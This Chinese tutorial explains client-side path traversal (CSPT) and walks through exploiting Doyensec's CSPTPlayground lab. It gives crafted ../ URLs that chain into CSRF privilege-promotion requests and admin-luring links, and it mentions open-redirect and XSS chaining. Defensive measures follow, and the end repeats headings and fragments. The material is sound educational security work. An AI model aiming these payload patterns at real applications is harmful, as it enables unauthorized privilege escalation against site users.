客户端路径遍历(CSPT)漏洞全面解析与实战指南<\/h1>

0x00 漏洞概述<\/h2>

1. 漏洞定义<\/h3>
CSPT(Client-Side Path Traversal，客户端路径遍历)是一种安全漏洞，其核心在于攻击者可以通过操纵前端处理的路径逻辑，在URL中插入`..\/<\/code>等字符来篡改实际访问的路径。这种漏洞允许攻击者将请求重定向到其他API接口或触发未授权操作。<\/p>`

2. 漏洞影响范围<\/h3>
几乎所有前端输入点都可能存在CSPT漏洞，包括但不限于：<\/p>

查询参数(Query Parameters)<\/li>
路径参数(Path Parameters)<\/li>
URL片段(Fragment Parameters)<\/li>
<\/ul>
3. 典型攻击示例<\/h3>
构造恶意链接：<\/p>
https:\/\/api.target.com\/api\/data?id=1337\/..\/..\/anotherEndpoint?details
<\/code><\/pre>
当受害者访问此链接时，实际发送的请求会被篡改为：<\/p>
https:\/\/api.target.com\/api\/anotherEndpoint
<\/code><\/pre>
0x01 漏洞原理<\/h2>
1. 核心概念<\/h3>
CSPT漏洞利用可分为两部分：Source(源)和Sink(汇)，与代码审计中的概念相似。<\/p>
1.1 Source(源)<\/h4>

在CSPT中，Source指触发HTTP请求的操作点<\/li>
是将前端输入映射到后续请求的关键点<\/li>
示例：根据前端传入的id值映射到不同的API请求<\/li>
<\/ul>
1.2 Sink(汇)<\/h4>

在CSPT中，Sink指另一个具有相同权限的API接口<\/li>
决定了攻击者能够执行的操作和漏洞的危害程度<\/li>
示例：接收特定JSON数据的API端点<\/li>
<\/ul>
2. 漏洞危害<\/h3>
CSPT本身危害有限，但与其他漏洞结合可形成"组合拳"：<\/p>

绕过CSRF防护措施(如随机数、SameSite属性等)<\/li>
实现未授权操作<\/li>
提升权限<\/li>
导致XSS攻击<\/li>
<\/ul>
0x02 靶场搭建<\/h2>
1. 环境准备<\/h3>
1.1 Node.js环境<\/h4>
推荐使用nvm管理Node版本：<\/p>
# 安装nvm<\/span>
<\/span><\/span>curl -o- https:\/\/raw.githubusercontent.com\/nvm-sh\/nvm\/v0.40.3\/install.sh | bash
<\/span><\/span>
<\/span><\/span># 配置环境变量<\/span>
<\/span><\/span>export NVM_DIR=<\/span>"<\/span>$(<\/span>[<\/span> -z "<\/span>${<\/span>XDG_CONFIG_HOME-}<\/span>"<\/span> ]<\/span> &&<\/span> printf %s "<\/span>${<\/span>HOME}<\/span>\/.nvm"<\/span> ||<\/span> printf %s "<\/span>${<\/span>XDG_CONFIG_HOME}<\/span>\/nvm"<\/span>)<\/span>"<\/span>
<\/span><\/span>[<\/span> -s "<\/span>$NVM_DIR\/nvm.sh"<\/span> ]<\/span> &&<\/span> \.<\/span> "<\/span>$NVM_DIR\/nvm.sh"<\/span>
<\/span><\/span>
<\/span><\/span># 安装指定版本Node.js<\/span>
<\/span><\/span>nvm install 20.9.0
<\/span><\/span>nvm use 20.9.0
<\/span><\/span>nvm alias default 20.9.0
<\/span><\/span><\/code><\/pre>1.2 靶场项目<\/h4>
使用Doyensec提供的CSPTPlayground：<\/p>
git clone https:\/\/github.com\/doyensec\/CSPTPlayground
<\/span><\/span><\/code><\/pre>2. 后端启动<\/h3>

使用Docker搭建MongoDB数据库<\/li>
进入CSPTPlayground\/backend\/app<\/code>目录<\/li>
安装依赖(建议添加--no-audit<\/code>参数)<\/li>
启动后端服务<\/li>
<\/ol>
3. 前端启动<\/h3>

进入CSPTPlayground\/frontend\/app<\/code>目录<\/li>
安装依赖(建议使用代理或国内镜像源)<\/li>
修改CSPTPlayground\/frontend\/app\/src\/config.js<\/code>中的配置<\/li>
启动前端服务<\/li>
<\/ol>
0x03 漏洞利用实战<\/h2>
1. CSPT2CSRF-POST<\/h3>
漏洞场景<\/h4>

访问页面时自动向API发送\/api\/v1\/notes\/ID\/seen<\/code>请求<\/li>
Note ID被映射到请求路径中<\/li>
<\/ul>
利用步骤<\/h4>

获取目标用户ID(如member用户的66fc8c17d29c4a98a44a4a87<\/code>)<\/li>
构造恶意链接：
\/vulnerable\/note_auto_post_sink\/..\/..\/sink\/promote\/lax_in_extra_param_promote\/66fc8c17d29c4a98a44a4a87?
<\/code><\/pre>
<\/li>
实际请求被转换为：
\/api\/sink\/promote\/lax_in_extra_param_promote\/66fc8c17d29c4a98a44a4a87?\/see
<\/code><\/pre>
<\/li>
诱导管理员访问此链接，实现权限提升<\/li>
<\/ol>
2. CSPT2CSRF-GET to POST<\/h3>
漏洞场景<\/h4>

首先发送GET请求获取Note详情<\/li>
将响应中的_id<\/code>用于构造后续请求路径<\/li>
<\/ol>
利用步骤<\/h4>

利用靶场提供的Gadget：
\/api\/gadget\/files\/66fc8d071bcf0dd223467bba\/raw
<\/code><\/pre>
<\/li>
构造恶意链接重定向到Gadget：
\/vulnerable\/note_auto_get_to_post_sink\/..\/..\/gadget\/files\/66fc8d071bcf0dd223467bba\/raw
<\/code><\/pre>
<\/li>
响应中的_id<\/code>被拼接为：
\/api\/v1\/notes\/..api\/sink\/promote\/lax_in_extra_param_promote\/66fc8c17d29c4a98a44a4a87?\/seen
<\/code><\/pre>
<\/li>
实际触发管理员权限提升请求<\/li>
<\/ol>
替代方案<\/h4>
若缺乏可用Gadget，可利用URL跳转：<\/p>
\/api\/gadget\/open_redirect?url=恶意服务器地址
<\/code><\/pre>
3. 1-click CSPT2CSRF: Path Param<\/h3>
漏洞场景<\/h4>

获取Note详情并将_id<\/code>显示在页面上<\/li>
用户操作(如点击Update按钮)时使用该ID构造请求<\/li>
<\/ol>
利用步骤<\/h4>

构造恶意链接：
\/vulnerable\/note_path_param\/..\/..\/gadget\/files\/66fc8d0755cf0db1bcfab29c\/raw\/details
<\/code><\/pre>
<\/li>
诱导管理员访问并点击Update按钮<\/li>
实际发送请求：
\/api\/sink\/promote\/body_or_query?id=66fc8c17d29c4a98a44a4a87
<\/code><\/pre>
<\/li>
实现权限提升(PUT请求)<\/li>
<\/ol>
4. 1-click CSPT2CSRF: Query Param<\/h3>
原理与Path Param类似，只是参数位置不同。<\/p>
5. 1-click CSPT2CSRF: Fragment Param<\/h3>
原理与前述相同，使用URL片段传递参数。<\/p>
6. CSPT2XSS: Query Param - innerHTML<\/h3>
漏洞场景<\/h4>

获取Note详情并直接写入页面<\/li>
未对内容进行适当转义<\/li>
<\/ol>
利用步骤<\/h4>

通过CSPT篡改响应内容<\/li>
注入恶意脚本实现XSS<\/li>
或通过URL重定向到恶意服务器获取XSS载荷<\/li>
<\/ol>
0x04 防御措施<\/h2>
1. 输入验证<\/h3>

对所有用户输入进行严格验证<\/li>
过滤..\/<\/code>等路径遍历字符<\/li>
使用白名单验证输入格式<\/li>
<\/ul>
2. 路径处理<\/h3>

避免前端处理敏感路径逻辑<\/li>
在后端规范化和验证完整路径<\/li>
使用绝对路径而非相对路径<\/li>
<\/ul>
3. 权限控制<\/h3>

实施最小权限原则<\/li>
对敏感操作进行二次验证<\/li>
使用CSRF Token等机制<\/li>
<\/ul>
4. 安全开发<\/h3>

避免将用户输入直接映射到API路径<\/li>
对动态生成的请求进行完整性检查<\/li>
实施内容安全策略(CSP)<\/li>
<\/ul>
0x05 参考资源<\/h2>

Netragard - Saving CSRF: Client Side Path Traversal to the Rescue<\/a><\/li>
Doyensec CSPT2CSRF Whitepaper<\/a><\/li>
PayloadsAllTheThings - Client Side Path Traversal<\/a><\/li>
CSPT Burp Extension<\/a><\/li>
<\/ol>

客户端路径遍历(CSPT)漏洞全面解析与实战指南<\/h1>

0x00 漏洞概述<\/h2>

0x01 漏洞原理<\/h2>

1. 核心概念<\/h3> CSPT漏洞利用可分为两部分：Source(源)和Sink(汇)，与代码审计中的概念相似。<\/p>

0x02 靶场搭建<\/h2>

1. 环境准备<\/h3>

0x03 漏洞利用实战<\/h2>

1. CSPT2CSRF-POST<\/h3>

2. CSPT2CSRF-GET to POST<\/h3>

3. 1-click CSPT2CSRF: Path Param<\/h3>

4. 1-click CSPT2CSRF: Query Param<\/h3> 原理与Path Param类似，只是参数位置不同。<\/p>

5. 1-click CSPT2CSRF: Fragment Param<\/h3> 原理与前述相同，使用URL片段传递参数。<\/p>

6. CSPT2XSS: Query Param - innerHTML<\/h3>

0x04 防御措施<\/h2>

0x05 参考资源<\/h2> Netragard - Saving CSRF: Client Side Path Traversal to the Rescue<\/a><\/li> Doyensec CSPT2CSRF Whitepaper<\/a><\/li> PayloadsAllTheThings - Client Side Path Traversal<\/a><\/li> CSPT Burp Extension<\/a><\/li> <\/ol>

1. 核心概念<\/h3>
CSPT漏洞利用可分为两部分：Source(源)和Sink(汇)，与代码审计中的概念相似。<\/p>

4. 1-click CSPT2CSRF: Query Param<\/h3>
原理与Path Param类似，只是参数位置不同。<\/p>

5. 1-click CSPT2CSRF: Fragment Param<\/h3>
原理与前述相同，使用URL片段传递参数。<\/p>

0x05 参考资源<\/h2>

Netragard - Saving CSRF: Client Side Path Traversal to the Rescue<\/a><\/li>
Doyensec CSPT2CSRF Whitepaper<\/a><\/li>
PayloadsAllTheThings - Client Side Path Traversal<\/a><\/li>
CSPT Burp Extension<\/a><\/li> <\/ol>